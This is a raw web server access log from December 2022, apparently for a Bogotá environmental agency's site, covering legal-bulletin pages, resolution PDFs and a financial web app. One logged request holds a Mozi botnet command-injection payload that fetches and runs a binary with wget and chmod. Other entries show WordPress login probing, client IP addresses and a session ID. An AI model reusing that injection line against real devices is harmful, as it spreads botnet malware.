190.27.128.131 - - [18/Dec/2022:17:06:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 249324
216.245.221.92 - - [18/Dec/2022:17:06:39 -0500] "HEAD / HTTP/1.1" 200 -
190.27.128.131 - - [18/Dec/2022:17:06:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2539.pdf HTTP/1.1" 200 543669
190.27.128.131 - - [18/Dec/2022:17:06:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2539.pdf HTTP/1.1" 200 543669
190.27.128.131 - - [18/Dec/2022:17:06:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2539.pdf HTTP/1.1" 206 1025
172.22.2.4 - - [18/Dec/2022:17:08:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:17:11:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:17:09:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
113.101.22.165 - - [18/Dec/2022:17:11:34 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
216.245.221.92 - - [18/Dec/2022:17:11:39 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.4 - - [18/Dec/2022:17:13:47 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:17:13:28 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60741
66.249.66.17 - - [18/Dec/2022:17:15:46 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:17:16:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:17:14:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:17:16:39 -0500] "HEAD / HTTP/1.1" 200 -
108.174.5.112 - - [18/Dec/2022:17:16:44 -0500] "GET /secretaria-de-ambiente-reconocio-las-234-empresas-y-entidades-con-mejores-estrategias-de-gestion-ambiental.html HTTP/1.1" 206 1048
172.22.2.4 - - [18/Dec/2022:17:15:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
213.180.203.5 - - [18/Dec/2022:17:20:31 -0500] "-" 408 -
5.45.207.117 - - [18/Dec/2022:17:20:36 -0500] "-" 408 -
5.255.253.103 - - [18/Dec/2022:17:20:41 -0500] "-" 408 -
87.250.224.186 - - [18/Dec/2022:17:20:46 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:17:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
201.245.192.253 - - [18/Dec/2022:17:20:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
5.255.253.152 - - [18/Dec/2022:17:21:01 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:17:21:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.108.213.46 - - [18/Dec/2022:17:21:16 -0500] "-" 408 -
216.245.221.92 - - [18/Dec/2022:17:21:39 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.85 - - [18/Dec/2022:17:21:46 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:17:20:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
110.14.63.77 - - [18/Dec/2022:17:22:20 -0500] "HEAD / HTTP/1.1" 200 -
110.14.63.77 - - [18/Dec/2022:17:22:21 -0500] "GET /wp-login.php HTTP/1.1" 404 1196
110.14.63.77 - - [18/Dec/2022:17:22:21 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1196
110.14.63.77 - - [18/Dec/2022:17:22:22 -0500] "GET /blog/wp-login.php HTTP/1.1" 404 1196
110.14.63.77 - - [18/Dec/2022:17:22:22 -0500] "GET /wp/wp-login.php HTTP/1.1" 404 1196
87.250.224.20 - - [18/Dec/2022:17:22:46 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:17:21:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
35.207.200.137 - - [18/Dec/2022:17:23:32 -0500] "GET / HTTP/1.1" 200 319
5.45.207.112 - - [18/Dec/2022:17:23:46 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:17:25:35 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:17:25:35 -0500] "-" 408 -
87.250.224.70 - - [18/Dec/2022:17:25:46 -0500] "-" 408 -
95.217.144.248 - - [18/Dec/2022:17:25:50 -0500] "-" 408 -
95.217.144.248 - - [18/Dec/2022:17:25:57 -0500] "-" 408 -
95.217.144.248 - - [18/Dec/2022:17:26:01 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:17:26:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
35.207.200.137 - - [18/Dec/2022:17:26:14 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [18/Dec/2022:17:26:39 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.18 - - [18/Dec/2022:17:27:18 -0500] "GET /animales-silvestres-regresaron-a-la-libertad-en-el-norte-de-bogota.html HTTP/1.1" 206 925
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /js/url.js HTTP/1.1" 404 1198
35.207.200.137 - - [18/Dec/2022:17:27:25 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
35.207.200.137 - - [18/Dec/2022:17:27:31 -0500] "GET /app-ads.txt HTTP/1.1" 404 1034
35.207.200.137 - - [18/Dec/2022:17:27:31 -0500] "GET /js/url.js HTTP/1.1" 404 1034
35.207.200.137 - - [18/Dec/2022:17:27:31 -0500] "GET /ads.txt HTTP/1.1" 404 1034
35.207.200.137 - - [18/Dec/2022:17:27:35 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
35.207.200.137 - - [18/Dec/2022:17:27:35 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
207.46.13.198 - - [18/Dec/2022:17:27:39 -0500] "GET /bla/resoluciones/resoluciones%202012/0284.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Dec/2022:17:26:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.45.207.120 - - [18/Dec/2022:17:28:46 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:17:27:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
66.249.73.84 - - [18/Dec/2022:17:29:22 -0500] "-" 408 -
173.252.107.24 - - [18/Dec/2022:17:29:45 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
201.245.192.253 - - [18/Dec/2022:17:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
201.245.192.253 - - [18/Dec/2022:17:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
201.245.192.253 - - [18/Dec/2022:17:31:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:17:31:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:32:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:33:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
186.84.20.209 - - [18/Dec/2022:17:35:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 167184
201.245.192.253 - - [18/Dec/2022:17:35:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:17:34:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61323
173.252.79.22 - - [18/Dec/2022:17:36:25 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
216.245.221.92 - - [18/Dec/2022:17:36:39 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.16 - - [18/Dec/2022:17:37:33 -0500] "GET /no-uses-musgo-en-la-elaboracion-de-tu-pesebre.html HTTP/1.1" 206 846
173.252.83.19 - - [18/Dec/2022:17:37:34 -0500] "GET /images/Musgo%20SDA%20(1)%20(1).png HTTP/1.1" 200 302122
172.22.2.4 - - [18/Dec/2022:17:38:31 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/Dec/2022:17:38:42 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/Dec/2022:17:38:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.145.216 - - [18/Dec/2022:17:40:38 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:17:38:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
201.245.192.253 - - [18/Dec/2022:17:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
201.245.192.253 - - [18/Dec/2022:17:40:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
201.245.192.253 - - [18/Dec/2022:17:40:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:17:41:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:43:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:17:45:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:17:44:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [18/Dec/2022:17:46:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:50:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:50:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:17:49:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:17:51:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:50:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
207.46.13.174 - - [18/Dec/2022:17:53:16 -0500] "GET /bla/resoluciones/resoluciones%202012/0388.pdf HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12505
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=EvTIeetXaejGxtCT5KJ5uAP-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [18/Dec/2022:17:54:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:37 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11169
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:39 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.192.253 - - [18/Dec/2022:17:54:42 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5600
201.245.192.253 - - [18/Dec/2022:17:54:43 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17514
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [18/Dec/2022:17:54:44 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.245.192.253 - - [18/Dec/2022:17:54:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
201.245.192.253 - - [18/Dec/2022:17:54:45 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3843
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 38828
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 14758
201.245.192.253 - - [18/Dec/2022:17:54:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 35489
201.245.192.253 - - [18/Dec/2022:17:54:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1372
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 20277
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 38828
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:17:54:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 14758
185.119.81.106 - - [18/Dec/2022:17:55:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [18/Dec/2022:17:55:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [18/Dec/2022:17:55:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.217.144.245 - - [18/Dec/2022:17:56:17 -0500] "-" 408 -
216.245.221.92 - - [18/Dec/2022:17:56:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:55:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:17:56:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
172.22.2.4 - - [18/Dec/2022:17:58:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
94.102.61.10 - - [18/Dec/2022:17:59:08 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
